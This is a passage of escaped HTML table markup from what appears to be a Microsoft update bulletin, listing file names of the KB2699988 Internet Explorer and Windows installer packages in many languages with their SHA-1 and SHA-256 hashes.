class=\"sbody-td\">BF8F7D43626AE5BFD1E68B27A6A365DF9C044A14DCF7A2595E607CF1214B8DC1</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-fin.exe</td><td class=\"sbody-td\">5AF8ED7189E1C3B35CDCF76AFDC2AAE8670E713B</td><td class=\"sbody-td\">4C17020A572988B01AEB7582BCB104EE0EB69CBA2F6852BBF507022AB1165172</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-csy.exe</td><td class=\"sbody-td\">B879485954774CFD5CF1B9892CBF8DAD5584BF95</td><td class=\"sbody-td\">60F1C6A4AAFA612E82E67F760BFDC0EF7CAAD7D7A039BC292F4E0EC40DF01405</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-esn.exe</td><td class=\"sbody-td\">AEA6E2F646268DE066B110472EC56618FD19F580</td><td class=\"sbody-td\">7E921E9100B967DECAE1E36F011B41F0DC0843AFFB7293224C1085BF19F46FD9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-heb.exe</td><td class=\"sbody-td\">A338ED9E9959B4C933CA5662F11D8B46BD4659A4</td><td class=\"sbody-td\">A65558846B6FFD7F5F949AA77A6994006FEF7BA7B5009C31D7E84B38CBDE2AD4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-hun.exe</td><td class=\"sbody-td\">22E4CD28A2A260A2328F988513230FBA30A0D29E</td><td class=\"sbody-td\">78A2F1C937101C09B15F18B22A82C8180D17DB5A9D5CE0E83CDAD945DB906B51</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-sve.exe</td><td class=\"sbody-td\">2C0FE3C0002A9A683157BE6E03127C7C993B5B88</td><td class=\"sbody-td\">5C0252FDA179573B266ABE1CA31AE8A20DB7AB3031FCC445D2A33E17DF54B14A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-rus.exe</td><td class=\"sbody-td\">1271C5343F3C1D5F9AEFBA0DA3E02EBEE89CF141</td><td class=\"sbody-td\">CAB5FD059EEF1E2582F1F9FE27F0423B9A6996B9A28BF43CF9B278AFA92F0D76</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-nld.exe</td><td class=\"sbody-td\">E6B4ACE0F24AF6DFE51CB6F42AD169F794CE967E</td><td class=\"sbody-td\">9B674CC1DCEF4EBEDE1F0135F27740562546C479C2A482501A6E2A9AB4E708B8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-nor.exe</td><td class=\"sbody-td\">24AF0D8820C4E915785D165F63148397C8F2277F</td><td class=\"sbody-td\">A639E65327BD89BE17D72EC50258248D09F40B6FDA0BBC5E34BFF71CB883C387</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-ptb.exe</td><td class=\"sbody-td\">F6E4B876CF90C2DE18F59E51AF33B9D8E1A428AA</td><td class=\"sbody-td\">1195A57A4D6A56FFCDFA65E3534B7178D91BE2ECB97B62F903B7EB07D06A451B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-dan.exe</td><td class=\"sbody-td\">2E3C68C7A5FE0A597EDD5BE81A83C954729794E7</td><td class=\"sbody-td\">5459A7F7A8683249FD5D9F66C094A8B80EA7F9CA9058197AEFAE652D4EAEF647</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-plk.exe</td><td class=\"sbody-td\">547377A435002F398FBB4FE5B171B06401DFAEDF</td><td class=\"sbody-td\">9B5B3B95C25547F4E06DA645DF92A187D2E74E354A17AD3C123F1358342B1A92</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-chs.exe</td><td class=\"sbody-td\">7A3846DA2D63E81497E41D911678221E006DA4D6</td><td class=\"sbody-td\">AC33C7F7F4BDF265CC060E578CBB2274285AEE36370B292E1AC22CB14331BE12</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-cht.exe</td><td class=\"sbody-td\">3BB4449248FB21F0C653F80AF0E9E6B14F1A66AA</td><td class=\"sbody-td\">D5625D0636064ED40E42C4C220D3487D92DF726CE28469BE58BD1EF1B36E928C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-ara.exe</td><td class=\"sbody-td\">50EF1C981FD9242598E8ED74EF283C73173B3701</td><td class=\"sbody-td\">EF50E1C339F4C2CC816600845D6569BF7023BD1BFD6D2ED44A95066F7CCC9554</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-fra.exe</td><td class=\"sbody-td\">91C217E1837A2CC757D1C0EAC8169A3BF4D9B430</td><td class=\"sbody-td\">C3D06C2BD604277CA518AFF758651C0571CD880B45436DEC972FCA457A0B3FCA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-ita.exe</td><td class=\"sbody-td\">C5954275F75D0A8D00A0082DF814342252F5E287</td><td class=\"sbody-td\">B2262D687B2229EC733350211B896043A37E3B2A7B6F88A05BE46C95F3423E8B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-jpn.exe</td><td class=\"sbody-td\">412FE146E85D7ED2DFFC02B13743580B1229DE1D</td><td class=\"sbody-td\">3F135D9D4A6B056D42BEFDFFC4A157685DB1E1CE0D8C1BBAC220969C0C92BB18</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-trk.exe</td><td class=\"sbody-td\">3E26B00A9B993B3A2FCBF704A84F214F19960F86</td><td class=\"sbody-td\">16BF78D26D068DBD4F6D38DC64B7CA97A663E1633D58BD1EC71273B7CC1C6CC4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-ptg.exe</td><td class=\"sbody-td\">77D39CEDB7A9DE60082A2452EA8643F67093ED2A</td><td class=\"sbody-td\">79843378318633F913626E8B68D175606C3C99B805124F0CDF4DA61780C18DD0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-deu.exe</td><td class=\"sbody-td\">3C4CA53D53CFB32790DC0EC81CA9E3109D10309A</td><td class=\"sbody-td\">FED6BB1DDC0EE120706F7D34BB0311223EF869120E43B2C63D7572716A2A8C3F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-kor.exe</td><td class=\"sbody-td\">3255B624EF7531FE0AB4AB804D274C1336CB749A</td><td class=\"sbody-td\">26E8D1B3EFCB6142530178E7A4DD10D66115F050DDD32C93423D12FB62C54C08</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-ell.exe</td><td class=\"sbody-td\">9BDE62C34C5A31F717A95C257B5DAD53CE79A459</td><td class=\"sbody-td\">12C3F40E7FAD037400EA71E80ED5BC5B5CFB047E981FAE330D1B46171F37BE33</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-rus.exe</td><td class=\"sbody-td\">B67B100A68BFE5C18C48BEB99F34D5DF65B4FB1E</td><td class=\"sbody-td\">F068E9358E5AB3E2D812D550A3DFC4EE24C1D356E4C1686DA2D533A9A7974B7F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-sve.exe</td><td class=\"sbody-td\">3CD1A55606A0BC5D4AE58AF2C22869A9473AECE0</td><td class=\"sbody-td\">5869D94E1EA12E706018CAE16569DD7DFB273702813EA00825197ED57DAD9015</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-esn.exe</td><td class=\"sbody-td\">6F5B01D41FF6A9EBB00D40668321CD78BE6F896A</td><td class=\"sbody-td\">39B4936F0B257EE481074859FC79408DBB7181D300DD306B50FAD40BD48DD7CC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-fin.exe</td><td class=\"sbody-td\">EF87D8C33143C99124B729C7C303D0F46A90D3D5</td><td class=\"sbody-td\">BFE0D0EFC56BA4E571DFEC54E25165E4804BBE28085AEB47D3192D643C1F8555</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-dan.exe</td><td class=\"sbody-td\">C89A99CB92C3EED42021C891E65A5536B7732672</td><td class=\"sbody-td\">E507E6D84FA6901C9F683C32B01C84D52FA2C531E7574DCE03CE6124C81BAF67</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-heb.exe</td><td class=\"sbody-td\">9D6256F165B6987E68FBF3063CBA4D2063F0819F</td><td class=\"sbody-td\">7F3408538C43F3CCADD13EEC833B86A2196C94F5112C2D4154A680BF78D02541</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-nld.exe</td><td class=\"sbody-td\">514BC69C3C2A6615BCC6410C293E6B9BBF389313</td><td class=\"sbody-td\">7400B76A4AD3A67A28FA47F2C6CC2427EDFC1257232362C70AF60E0E5F4D6DD4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-ptb.exe</td><td class=\"sbody-td\">E08874BE1C472C4F54830C3A89678DC7E31706C9</td><td class=\"sbody-td\">DB6239501C6374737B42ED389F576E4B9CC7B5AB925CF23225FE7237897BC67C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-csy.exe</td><td class=\"sbody-td\">B4FFB29252F43F0FF91A0EE26A563EAE99837828</td><td class=\"sbody-td\">02FD91DEECDD6EDB058BD4B498A8429ED2A19E919A324ACBC1A16223D52CC26B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-nor.exe</td><td class=\"sbody-td\">93669F99BBD3BDAC3F3C1D46C06C13FD17EF289A</td><td class=\"sbody-td\">EE01CFF57C560AC76E93794520CE4D983257B3D906F39E03FB7984E9A2A08635</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-hun.exe</td><td class=\"sbody-td\">5F60CADADC9024015ACD01D3D83CEB18CA8DE77E</td><td class=\"sbody-td\">A632F721C4E95D13D12791061E125600790D942F5E3FB54994E6499BDF64AE93</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-plk.exe</td><td class=\"sbody-td\">8A720D7DB6FD302169973BD7FBDA1744A20E607B</td><td class=\"sbody-td\">5E3AF1932818AF5BA49F9D2B41B3E3AEEE1C195600B3D3CDE0428FF081B6FB39</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-trk.exe</td><td class=\"sbody-td\">9E74B3098A9194A5B56CFC1DA1140654F21FE236</td><td class=\"sbody-td\">7561F39798A58CA17B7CE69EE8A10039C0BC085F7351085F7663A790BEFF2698</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-ell.exe</td><td class=\"sbody-td\">C2E6782F96581A34A97A5923DF9B6E40F32AD472</td><td class=\"sbody-td\">AAEC8EE11ABD653753518E4CD70E468A83818D154AC6F145A7FF1FA63DFC4132</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-deu.exe</td><td class=\"sbody-td\">3C28E9CE3DE9FFC4BABB83109AD578B9B01C880D</td><td class=\"sbody-td\">76CFEDC57448FF3C4582059A9B78569C21F7B8AB7C4A35DB40DF516B02A1BC39</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003.windowsxp-kb2699988-x64-enu.exe</td><td class=\"sbody-td\">AAEDE07C9A94A51F39345F8B6C360AFFEF733237</td><td class=\"sbody-td\">F1DCA1495ADBEE9868458025E1BF7776465611A275571DD854AB6523B29D8DF6</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003.windowsxp-kb2699988-x64-jpn.exe</td><td class=\"sbody-td\">A3C33B0AA97F7EEC668EF478E78EC8CD64526675</td><td class=\"sbody-td\">0DF85E4BCF4877CDCE577A6E32532471ABB23792C2CBC630821412B967259EE4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003.windowsxp-kb2699988-x64-fra.exe</td><td class=\"sbody-td\">3950B9E1C8BCE927EAF103C2FA26A0E87A2668E4</td><td class=\"sbody-td\">5400C1EFE2A011851186547EB8E88740CF5AB61C343C46993C17C2275BCF8318</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003.windowsxp-kb2699988-x64-ptb.exe</td><td class=\"sbody-td\">1929547CF2B0E91C9C4D284C026BF2CF6B7586E9</td><td class=\"sbody-td\">8653DEF834DC28CB1B329CED1310D01F0247FEA71BA1AB94AC32ABAFC85B13C4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003.windowsxp-kb2699988-x64-deu.exe</td><td class=\"sbody-td\">5AD34FEF0D2C5E654EB3D6F82BDD280FC45A6F07</td><td class=\"sbody-td\">5F5E29DD1D21DB01D6AFC0ED5145E6072C4194757D2D4E09F916856EFC489D47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003.windowsxp-kb2699988-x64-esn.exe</td><td class=\"sbody-td\">EDAED3C394945A8DF6E10B242D21BA32239118E8</td><td class=\"sbody-td\">FD74A6C482F5212064E6110CD7CD551C6571EFF8BB9D79C796DFBDE18ACBC24A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003.windowsxp-kb2699988-x64-rus.exe</td><td class=\"sbody-td\">E0DCD4BE0FFF4EFCA99DB6ADC44628ECE39FA34D</td><td class=\"sbody-td\">D240ABC5547E06B31F20D05251B91C250CAEDFE516A145AEC8093B497B883EE2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003.windowsxp-kb2699988-x64-cht.exe</td><td class=\"sbody-td\">3BC88A1260723F1F0C209B974AF658BB9D79EF9D</td><td class=\"sbody-td\">12C15434D3CA0EE8470CF555D8552C6911C398550519B47807F6445B9858D595</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003.windowsxp-kb2699988-x64-chs.exe</td><td class=\"sbody-td\">CC1C44D836B3A15A1956D2205C9C2578071D1FCF</td><td class=\"sbody-td\">BEEBC6DD1224CBD12BE4A73913843C4238230D6304599BF9D43D89AA5165B7EB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003.windowsxp-kb2699988-x64-ita.exe</td><td class=\"sbody-td\">974C4A2F54136A475567C40F0F684443D2BF580D</td><td class=\"sbody-td\">CED5DB368461BAE1AD9847C75A78B2433618B37FE0D9D9F6264CD2F9F4F3C743</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003.windowsxp-kb2699988-x64-kor.exe</td><td class=\"sbody-td\">7AD0EBA699293346BAB941039106564F8BBAB56F</td><td class=\"sbody-td\">2AD67406E693D37C371C90BC52E8366E9B236F1803D54D46B4F36E664E53D41F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2699988-x64-enu.exe</td><td class=\"sbody-td\">5439BA7C52F41037933ADD77D0E31A4FBF2D3822</td><td class=\"sbody-td\">B18DD013FC18980FEB3B8E4B15F3110FABF49AE131E1CBB326472A0B39E5DA4A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2699988-x64-jpn.exe</td><td class=\"sbody-td\">F91190A7DDC0531B655D853E8E0E99004CF2CE1A</td><td class=\"sbody-td\">4970F2751812E0630967A83D994BC032F3FAAAFB160D39066FE796E4101283EA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2699988-x64-fra.exe</td><td class=\"sbody-td\">BF065F6B9B51B77E4FEF9BCC7B5A35F3503D10D0</td><td class=\"sbody-td\">E308E747860F32F54EE27C4E4E7F815B5D4F10E3FDFDD522367285921C8F0006</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2699988-x64-ptb.exe</td><td class=\"sbody-td\">B3A3B01E928556054772BDEDF8063CE2AEB93855</td><td class=\"sbody-td\">2C9BC8CCEAE2701B66BDC44817487E1B2ED905F16775D77633A66807ED7F33BA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-csy.exe</td><td class=\"sbody-td\">13F7596C84BF670D60899F2BFB35D70F05E0A455</td><td class=\"sbody-td\">BCBA4EB440BA927C6C4F720F1E72F764A80EE852FBE9F7408B02E65874A3A849</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-fra.exe</td><td class=\"sbody-td\">CE1F3BE52044FA452D280974DB8EC882194608DB</td><td class=\"sbody-td\">9C2FAAB8AE48FA227A4610D329CE6B6412FBC33B1FB46603C9F2EAE615DDA277</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-nld.exe</td><td class=\"sbody-td\">022C01255EE447DC8BE60340B92C8E377DC98853</td><td class=\"sbody-td\">0C7B8A40EA8E232EAE2EA3D4C02DAD958369B78F2F67DD08336EA9B9DC277024</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-jpn.exe</td><td class=\"sbody-td\">CDB1CD79DC73E8D01D2224608A078226155DE24A</td><td class=\"sbody-td\">29F6065AC9371AA96A49AD35EEA06FFC89FF770CEF6BD5A08996ABDE0FF040F2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-deu.exe</td><td class=\"sbody-td\">B8E0E423B30D465EE158B6349A078281D9BC450C</td><td class=\"sbody-td\">DF7DDAECAEE84E39F119FB8B0E3785179F344285FC7E0AE249662A9AE8079399</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-ptg.exe</td><td class=\"sbody-td\">892351AE6CCC131B871594E756B750394E4CB31C</td><td class=\"sbody-td\">5EA1D3FE5226B8AE22A9FCAB3DA7C7BF3579BE785EC0161A203C908ACFA6972B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-sve.exe</td><td class=\"sbody-td\">363D06E868BCAFB0F7D9A20621D93D5E9DB11DFD</td><td class=\"sbody-td\">5B72C49DA9845A0AB9C6C660ACCFD3944A2D2231C5277AE85B5C1E011AC48051</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-trk.exe</td><td class=\"sbody-td\">2EBF5A591631CDA8D903C7A777E225C4D9D2A43D</td><td class=\"sbody-td\">E3C5F8ADA5852273DD53BFF1B7C21A645C26FE2F7436803A4569D3E5C5BD24C9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-rus.exe</td><td class=\"sbody-td\">713C56ED3A072A617A538532AD39E1E8CB6678A8</td><td class=\"sbody-td\">DF4A593960D29D1EE20696C73B1E72E0E717679B25CA4DE02181D3713DA4D541</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-chs.exe</td><td class=\"sbody-td\">81BE80A10277177FE4F3487E92906F8AA81D7AC2</td><td class=\"sbody-td\">B65CA0340C846863E88E493DF9F88540CB82016B2AA43B9555F1C418DF0DE5D7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-kor.exe</td><td class=\"sbody-td\">92C023E0B30D5E95FAE3B7C716598C3F886A66C5</td><td class=\"sbody-td\">FDD734CF4E87C9A92B350A35955B9999FE45EBF658E58F865A8B763BA8A1F07A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsserver2003-kb2699988-x86-cht.exe</td><td class=\"sbody-td\">41F71CF7DFAD46396DAB99BE8A92D76B3BFCD526</td><td class=\"sbody-td\">3B87CC03BD142E54C13F995C7343886798228F7D3053097CB211E1008CBDEC81</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windows6.0-kb2699988-x64.msu</td><td class=\"sbody-td\">FC47B501926263E1DB4B448E173F751FD599F4B2</td><td class=\"sbody-td\">C54FB2D9B2FC0C1BA4BDF840E9B400D130692DA37C9044BFB99EC27D970DC5E3</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-fra.exe</td><td class=\"sbody-td\">3776561E2520FAD7090ED5B8DB470FA4C3B5DF82</td><td class=\"sbody-td\">3A25E0A1BF6C2B334696C38F8758F386BF4CE4534A3A4DB09FB489B82272A717</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-jpn.exe</td><td class=\"sbody-td\">BCB7C5FC4FBAD5821801F17569CF19A99D981950</td><td class=\"sbody-td\">C0B21D753DC6E541E55CD5AE77E904A67FCCB1020E3B55C8F9CFB3870E1E6CA7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-ptg.exe</td><td class=\"sbody-td\">114319A4920BF07A3D4F6B377DE4D34D4BFC36FC</td><td class=\"sbody-td\">5C34EFF1D3AAC2861327EE08829960DD59DF50864AB89F72D32B2B63130693EC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-enu.exe</td><td class=\"sbody-td\">37BF6B94B5717FC27C264A3A6D2925D38C7B00CB</td><td class=\"sbody-td\">B92BB6D9F9D41F9843EFB4A7AF8067100F98C5F81A446D7CEC370A4F02BEAC7D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-csy.exe</td><td class=\"sbody-td\">0B3E9B63CEA006705FF2E76C971750B5950B8473</td><td class=\"sbody-td\">9A04372C3049D337DE864953C61469B4F5442C94725071BADA5FDCADD5B1D63A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-dan.exe</td><td class=\"sbody-td\">D617FE6600B6987F7B4529BB08619CC0CBD9A881</td><td class=\"sbody-td\">F615C546565DC695FBC4012067039B878EF9773D61C12C15C0CE22295764D152</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-fin.exe</td><td class=\"sbody-td\">D1B4FDD35B0B7268E6CF71FB8F1F0D5F0FC928CC</td><td class=\"sbody-td\">7C9507D8ACAD13198C36685A33ADAB27BDF2A52B54FE29E91692E7A08FA6E36D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-nld.exe</td><td class=\"sbody-td\">0EB3B7ECBC965E68EBED417995F2CAF0EF60BBAB</td><td class=\"sbody-td\">3EA01E2FDFA879BFEEBEF55DEA905A439D5031151C3D00CF8237AB166CFB80E2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-heb.exe</td><td class=\"sbody-td\">F05F5DEB2AEDA0693B0F54B04ACD724D4E5858CC</td><td class=\"sbody-td\">092FDF7238EAED170768E29342C4666A4B5DA63A79F4A860BFE6AFAA7ECB10A2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-ptb.exe</td><td class=\"sbody-td\">B89E033A05B1B276659AF08339A2639126917059</td><td class=\"sbody-td\">CA0B250BACC45006E81A9D797A0A75E2DAF58D36C11A0082103717C356A40A44</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-sve.exe</td><td class=\"sbody-td\">990FAC7E7B8B6BBAD2B71C86796D08F3941F8AFE</td><td class=\"sbody-td\">3B117F63F67DE5F94D363F75F479B6CB51E11D933C0BAEB826C8E6BB60DEDD02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-nor.exe</td><td class=\"sbody-td\">776FDD3599BE07D1803A55DD34960CA3312B4C3A</td><td class=\"sbody-td\">E23138CEC571877B91952A23FD352259D4BA378400C693B06D128D1B32AB7811</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-esn.exe</td><td class=\"sbody-td\">B2037A19F2319B5D5C1F1FC7B44A073D6B6B9CBC</td><td class=\"sbody-td\">F594F08355A5F2CBBCA6FE898CF7F4632FC69D875CC0688F047A1EA33F653233</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-rus.exe</td><td class=\"sbody-td\">7CA2B440829750044DCC41058FDFA9F9EE194D6A</td><td class=\"sbody-td\">0C468C88EF3306CF2B9D9B59A88594B8F390D70E833B54CAC8D0E5862422F662</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-chs.exe</td><td class=\"sbody-td\">B73B6C5C39CF8699152DBA43E66252F915784CAE</td><td class=\"sbody-td\">D0C3F66E04761FB7133FE7E0B09F9D0E487109E9AEF3E8E1ED34614474321D1B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-ell.exe</td><td class=\"sbody-td\">31C5426B7CEB54525BB38F81CEDA39CC3C204A75</td><td class=\"sbody-td\">D75A254D15524C47E8354AF7A5C34AA0170A6C0017D938B6D089226F13123386</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-ptg.exe</td><td class=\"sbody-td\">B9CC37983CC37B5132AEE1ADF9F16DBA73F09EC2</td><td class=\"sbody-td\">67EC3E4DD2DABB11E970580013BF4B8F94239FEF0D7D68C1D5044679F49762C9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-kor.exe</td><td class=\"sbody-td\">5FE1D21C80B35EC677DAAE6A4A305624551100DB</td><td class=\"sbody-td\">A68E09F4186706CC3F7455008CEC48B3EFCA9DAE78391DDC39C22DCD0BDCBC0A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-trk.exe</td><td class=\"sbody-td\">2B1ED70B291D8F04F002384015EC02D5F70D1CC7</td><td class=\"sbody-td\">320B64857687ACF3AAAC47B499EA401B4CDEA179918AD876C47B0D1CC2D5B440</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-jpn.exe</td><td class=\"sbody-td\">F1127E0A55D14DBAF720BA6E0232DD8D21750633</td><td class=\"sbody-td\">70A812DE2FA438B4573FF1DCCFE9E9F5C7B6857DF5A3314415A56AB76071F709</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-ita.exe</td><td class=\"sbody-td\">7C5E13285247BAA521D4378E90B321EB937F9DDC</td><td class=\"sbody-td\">15B17995D2C2730D8C77B8212B55E7A4011FAA3D3050251DBB964BEDF5F61872</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-fra.exe</td><td class=\"sbody-td\">74A903B9C7FD88E04253CDF90B3B7E64AAC95538</td><td class=\"sbody-td\">84F44D1287EC7FB79946930D2F57CC30A84B621041A2C15A4C18DD11E8717B5B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-fra.exe</td><td class=\"sbody-td\">2396DD3C9709515D323A6A44068A305E5EC6C903</td><td class=\"sbody-td\">EF238010DA1B6506156CD53A78CB56CEB7F45D56E10BF18A80CFFE8CC2FD8C5B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-csy.exe</td><td class=\"sbody-td\">71EA345B4C2CE76EDFDDAB0A4FA997851D17D912</td><td class=\"sbody-td\">EF45C563AD16E80501FAA74965A3243E6D402E69CB66DC784FA9FAEEE9DA2103</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-deu.exe</td><td class=\"sbody-td\">9D75245CF72C1A3B58215AB1E67A671B1B8ED599</td><td class=\"sbody-td\">C8628577DBF8E734735020D143D6628ED038B1A398499ECBD032634B08779365</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-cht.exe</td><td class=\"sbody-td\">7CD990D067B049C7E759D267128FE391D7C56153</td><td class=\"sbody-td\">7067985EE455E4918A1BB8A5A05041709C69567D1EDB81EF8B1C5EB8FD77FA8E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windows6.0-kb2699988-x86.msu</td><td class=\"sbody-td\">6AF6F0836E82C9B49603D7C4DFB558D9812521DF</td><td class=\"sbody-td\">F6D346AF76593CAAEA366565F4E2C73C70E3F4C13D571EBF62FC7D91463544FD</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2699988-x64-deu.exe</td><td 